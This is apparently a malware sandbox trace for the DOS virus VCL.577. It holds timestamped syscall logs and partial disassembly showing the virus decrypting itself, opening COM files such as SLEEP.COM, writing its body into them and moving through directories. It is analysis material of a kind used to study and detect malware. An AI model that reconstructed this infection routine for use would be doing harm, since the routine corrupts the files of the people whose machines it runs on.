Sample viewer

vx.netlux.org/Virus.DOS.VCL.577

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:13.453557665Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0x2d
0x12aec: ja 0x12aff
0x12aee: mov di, 0x100
0x12af1: lea si, word ptr [bp + 0x163]
0x12af5: mov cx, 3
0x12af8: rep movsb byte ptr es:[di], byte ptr [si]
0x12afa: mov di, 0x100
0x12afd: jmp di
0x12aff: lea si, word ptr [bp + 0x166]
0x12b03: mov di, si
0x12b05: mov cx, 0x1de
0x12b08: shr cx, 1
0x12b0a: call 0x12b10
0x12b0d: jmp 0x12b40
0x12b10: lodsw ax, word ptr [si]
0x12b11: not al
0x12b13: dec al
0x12b15: dec al
0x12b17: xchg al, ah
0x12b19: add ah, 2

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11482,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:49.086480516Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0x2d
0x12aec: ja 0x12aff
0x12aee: mov di, 0x100
0x12af1: lea si, word ptr [bp + 0x163]
0x12af5: mov cx, 3
0x12af8: rep movsb byte ptr es:[di], byte ptr [si]
0x12afa: mov di, 0x100
0x12afd: jmp di
0x12aff: lea si, word ptr [bp + 0x166]
0x12b03: mov di, si
0x12b05: mov cx, 0x1de
0x12b08: shr cx, 1
0x12b0a: call 0x12b10
0x12b0d: jmp 0x12b40
0x12b10: lodsw ax, word ptr [si]
0x12b11: not al
0x12b13: dec al
0x12b15: dec al
0x12b17: xchg al, ah
0x12b19: add ah, 2

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":46,"TimeBased":true,"OriginalID":11482,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:49.141504615Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0x2d
0x12aec: ja 0x12aff
0x12aee: mov di, 0x100
0x12af1: lea si, word ptr [bp + 0x163]
0x12af5: mov cx, 3
0x12af8: rep movsb byte ptr es:[di], byte ptr [si]
0x12afa: mov di, 0x100
0x12afd: jmp di
0x12aff: lea si, word ptr [bp + 0x166]
0x12b03: mov di, si
0x12b05: mov cx, 0x1de
0x12b08: shr cx, 1
0x12b0a: call 0x12b10
0x12b0d: jmp 0x12b40
0x12b10: lodsw ax, word ptr [si]
0x12b11: not al
0x12b13: dec al
0x12b15: dec al
0x12b17: xchg al, ah
0x12b19: add ah, 2
2018-12-25T12:30:49.144481713Z 78 PC: 12b54 | Find first file
2018-12-25T12:30:49.150797175Z 67 PC: 12b6c | Get or set file attributes
2018-12-25T12:30:49.156529783Z 67 PC: 12b7a | Get or set file attributes
2018-12-25T12:30:49.181533981Z 61 PC: 12b82 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.18859972Z 87 PC: 12b88 | Get or set file date and time
2018-12-25T12:30:49.189815966Z 63 PC: 12b95 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:49.196970031Z 66 PC: 12bb4 | Move file pointer
2018-12-25T12:30:49.202333336Z 64 PC: 12bbf | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:49.205384368Z 66 PC: 12bc8 | Move file pointer
2018-12-25T12:30:49.207210737Z 42 PC: 12c11 | Get date 0x12c11: cmp al, 0
0x12c13: je 0x12c53
0x12c15: cmp al, 1
0x12c17: je 0x12c30
0x12c19: cmp al, 2
0x12c1b: je 0x12c37
0x12c1d: cmp al, 3
0x12c1f: je 0x12c3e
0x12c21: cmp al, 4
0x12c23: je 0x12c45
0x12c25: cmp al, 5
0x12c27: je 0x12c4c
0x12c29: mov word ptr [bp + 0x15d], 0x494c
0x12c2f: ret
0x12c30: mov word ptr [bp + 0x15d], 0x4f56
0x12c36: ret
0x12c37: mov word ptr [bp + 0x15d], 0x454c
0x12c3d: ret
0x12c3e: mov word ptr [bp + 0x15d], 0x4953
0x12c44: ret
2018-12-25T12:30:49.210642585Z 64 PC: 12bd6 | Write file or device (Write 99 bytes on handle 5)
2018-12-25T12:30:49.213856962Z 64 PC: 12bf1 | Write file or device (Write 478 bytes on handle 5)
2018-12-25T12:30:49.226078663Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:30:49.228140857Z 62 PC: 12bfc | Close file
2018-12-25T12:30:49.25086905Z 67 PC: 12c08 | Get or set file attributes
2018-12-25T12:30:49.260938414Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.264336764Z 67 PC: 12b6c | Get or set file attributes (See above)
2018-12-25T12:30:49.269752324Z 67 PC: 12b7a | Get or set file attributes (See above)
2018-12-25T12:30:49.27937897Z 61 PC: 12b82 | Open file (See above)
2018-12-25T12:30:49.28703781Z 87 PC: 12b88 | Get or set file date and time (See above)
2018-12-25T12:30:49.288343128Z 63 PC: 12b95 | Read file or device (See above)
2018-12-25T12:30:49.294599287Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:30:49.296422914Z 64 PC: 12bbf | Write file or device (See above)
2018-12-25T12:30:49.298967243Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T12:30:49.300106552Z 42 PC: 12c11 | Get date (See above)
2018-12-25T12:30:49.303365652Z 64 PC: 12bd6 | Write file or device (See above)
2018-12-25T12:30:49.306822391Z 64 PC: 12bf1 | Write file or device (See above)
2018-12-25T12:30:49.314852343Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:30:49.317173088Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:30:49.324954532Z 67 PC: 12c08 | Get or set file attributes (See above)
2018-12-25T12:30:49.334842871Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.338396481Z 67 PC: 12b6c | Get or set file attributes (See above)
2018-12-25T12:30:49.344235243Z 67 PC: 12b7a | Get or set file attributes (See above)
2018-12-25T12:30:49.35442771Z 61 PC: 12b82 | Open file (See above)
2018-12-25T12:30:49.367440292Z 87 PC: 12b88 | Get or set file date and time (See above)
2018-12-25T12:30:49.36908556Z 63 PC: 12b95 | Read file or device (See above)
2018-12-25T12:30:49.375640596Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:30:49.377148377Z 64 PC: 12bbf | Write file or device (See above)
2018-12-25T12:30:49.37985919Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T12:30:49.381261054Z 42 PC: 12c11 | Get date (See above)
2018-12-25T12:30:49.383352292Z 64 PC: 12bd6 | Write file or device (See above)
2018-12-25T12:30:49.386277434Z 64 PC: 12bf1 | Write file or device (See above)
2018-12-25T12:30:49.394502426Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:30:49.395835817Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:30:49.403424961Z 67 PC: 12c08 | Get or set file attributes (See above)
2018-12-25T12:30:49.412969975Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.415427884Z 67 PC: 12b6c | Get or set file attributes (See above)
2018-12-25T12:30:49.421877535Z 67 PC: 12b7a | Get or set file attributes (See above)
2018-12-25T12:30:49.431958043Z 61 PC: 12b82 | Open file (See above)
2018-12-25T12:30:49.43843756Z 87 PC: 12b88 | Get or set file date and time (See above)
2018-12-25T12:30:49.443457624Z 63 PC: 12b95 | Read file or device (See above)
2018-12-25T12:30:49.450108484Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:30:49.451337178Z 64 PC: 12bbf | Write file or device (See above)
2018-12-25T12:30:49.455652669Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T12:30:49.456912909Z 42 PC: 12c11 | Get date (See above)
2018-12-25T12:30:49.45888079Z 64 PC: 12bd6 | Write file or device (See above)
2018-12-25T12:30:49.46240935Z 64 PC: 12bf1 | Write file or device (See above)
2018-12-25T12:30:49.478387126Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:30:49.480185868Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:30:49.488921142Z 67 PC: 12c08 | Get or set file attributes (See above)
2018-12-25T12:30:49.498410387Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.500902084Z 67 PC: 12b6c | Get or set file attributes (See above)
2018-12-25T12:30:49.506552276Z 67 PC: 12b7a | Get or set file attributes (See above)
2018-12-25T12:30:49.51736795Z 61 PC: 12b82 | Open file (See above)
2018-12-25T12:30:49.523901502Z 87 PC: 12b88 | Get or set file date and time (See above)
2018-12-25T12:30:49.525481763Z 63 PC: 12b95 | Read file or device (See above)
2018-12-25T12:30:49.532645813Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:30:49.534230761Z 64 PC: 12bbf | Write file or device (See above)
2018-12-25T12:30:49.537019937Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T12:30:49.539462028Z 42 PC: 12c11 | Get date (See above)
2018-12-25T12:30:49.541784702Z 64 PC: 12bd6 | Write file or device (See above)
2018-12-25T12:30:49.5447662Z 64 PC: 12bf1 | Write file or device (See above)
2018-12-25T12:30:49.553936533Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:30:49.555662935Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:30:49.563347231Z 67 PC: 12c08 | Get or set file attributes (See above)
2018-12-25T12:30:49.574026298Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.577991904Z 67 PC: 12b6c | Get or set file attributes (See above)
2018-12-25T12:30:49.583715699Z 67 PC: 12b7a | Get or set file attributes (See above)
2018-12-25T12:30:49.594229588Z 61 PC: 12b82 | Open file (See above)
2018-12-25T12:30:49.600671848Z 87 PC: 12b88 | Get or set file date and time (See above)
2018-12-25T12:30:49.602287692Z 63 PC: 12b95 | Read file or device (See above)
2018-12-25T12:30:49.60922864Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:30:49.610707159Z 64 PC: 12bbf | Write file or device (See above)
2018-12-25T12:30:49.613515902Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T12:30:49.615951126Z 42 PC: 12c11 | Get date (See above)
2018-12-25T12:30:49.618328436Z 64 PC: 12bd6 | Write file or device (See above)
2018-12-25T12:30:49.628857893Z 64 PC: 12bf1 | Write file or device (See above)
2018-12-25T12:30:49.638616747Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:30:49.640850777Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:30:49.649580529Z 67 PC: 12c08 | Get or set file attributes (See above)
2018-12-25T12:30:49.66025955Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.663504969Z 67 PC: 12b6c | Get or set file attributes (See above)
2018-12-25T12:30:49.669360614Z 67 PC: 12b7a | Get or set file attributes (See above)
2018-12-25T12:30:49.679360961Z 61 PC: 12b82 | Open file (See above)
2018-12-25T12:30:49.686813951Z 87 PC: 12b88 | Get or set file date and time (See above)
2018-12-25T12:30:49.688525525Z 63 PC: 12b95 | Read file or device (See above)
2018-12-25T12:30:49.6951108Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:30:49.697679429Z 64 PC: 12bbf | Write file or device (See above)
2018-12-25T12:30:49.700505653Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T12:30:49.702127605Z 42 PC: 12c11 | Get date (See above)
2018-12-25T12:30:49.705157365Z 64 PC: 12bd6 | Write file or device (See above)
2018-12-25T12:30:49.708663009Z 64 PC: 12bf1 | Write file or device (See above)
2018-12-25T12:30:49.716908245Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:30:49.725612272Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:30:49.733532587Z 67 PC: 12c08 | Get or set file attributes (See above)
2018-12-25T12:30:49.743033896Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.745936235Z 67 PC: 12b6c | Get or set file attributes (See above)
2018-12-25T12:30:49.751913686Z 67 PC: 12b7a | Get or set file attributes (See above)
2018-12-25T12:30:49.761317247Z 61 PC: 12b82 | Open file (See above)
2018-12-25T12:30:49.773494469Z 87 PC: 12b88 | Get or set file date and time (See above)
2018-12-25T12:30:49.774893327Z 63 PC: 12b95 | Read file or device (See above)
2018-12-25T12:30:49.781186694Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:30:49.783085157Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:30:49.789982265Z 67 PC: 12c08 | Get or set file attributes (See above)
2018-12-25T12:30:49.799629638Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.80295157Z 59 PC: 12b5e | Change current directory